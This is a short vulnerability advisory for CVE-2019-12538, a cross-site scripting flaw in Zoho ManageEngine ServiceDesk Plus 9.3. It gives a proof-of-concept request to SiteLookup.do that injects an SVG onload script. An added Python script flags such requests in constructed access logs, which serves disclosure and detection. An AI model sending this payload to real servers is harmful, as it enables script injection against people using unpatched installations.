
CVE-2019-12538 Zoho ManageEngine ServiceDesk Plus 9.3 XSS vulnerability in SiteLookup.do

Information

Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SiteLookup.do qc_siteID parameter.

Author: Tarantula Team - VinCSS (a member of Vingroup)

Payload

domain/SiteLookup.do?configID=0&SELECTSITE=qc_siteID"/><svg onload=alert('XSS')>&userConfigID=1&SELECTEDSITEID=1&SELECTEDSITENAME=
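
A log check for requests like the one above, added here as an example (not part of the original advisory): it flags SiteLookup.do requests in which any decoded query parameter contains characters that close a quoted attribute or open a tag. It checks every parameter rather than one name, since the description names qc_siteID while the request above carries the markup in SELECTSITE. The log lines, client addresses and the /Other.do path are constructed, and the common log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (common log format); addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jun/2019:10:00:00 +0000] "GET /SiteLookup.do?configID=0'
    '&SELECTSITE=qc_siteID&userConfigID=1&SELECTEDSITEID=1&SELECTEDSITENAME=Head%20Office'
    ' HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jun/2019:10:02:13 +0000] "GET /SiteLookup.do?configID=0'
    '&SELECTSITE=qc_siteID%22%2F%3E%3Csvg%20onload%3Dalert(%27XSS%27)%3E&userConfigID=1'
    '&SELECTEDSITEID=1&SELECTEDSITENAME= HTTP/1.1" 200 5188',
    # Constructed path: markup sent to a different page is out of scope for this check.
    '192.0.2.44 - - [01/Jun/2019:10:05:40 +0000] "GET /Other.do?q=%3Cb%3E HTTP/1.1" 200 900',
]

# Client address and request target of one log entry.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Characters that close a double-quoted HTML attribute or open a new tag.
BREAKOUT = re.compile(r'[<>"]')


def suspicious_params(log_line):
    """Return (client, [param names]) for a SiteLookup.do request whose decoded
    parameter values contain attribute-breakout characters, else None."""
    m = LINE.match(log_line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    if not url.path.lower().endswith("/sitelookup.do"):
        return None
    # parse_qsl percent-decodes each value, so %22 and %3C are seen as " and <.
    hits = [name for name, value in parse_qsl(url.query, keep_blank_values=True)
            if BREAKOUT.search(value)]
    return (client, hits) if hits else None


def scan(lines):
    """Return one (client, params) tuple per flagged log line."""
    return [hit for hit in map(suspicious_params, lines) if hit]


if __name__ == "__main__":
    for client, params in scan(SAMPLE_LOG):
        print(f"{client}: markup characters in {', '.join(params)}")
```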
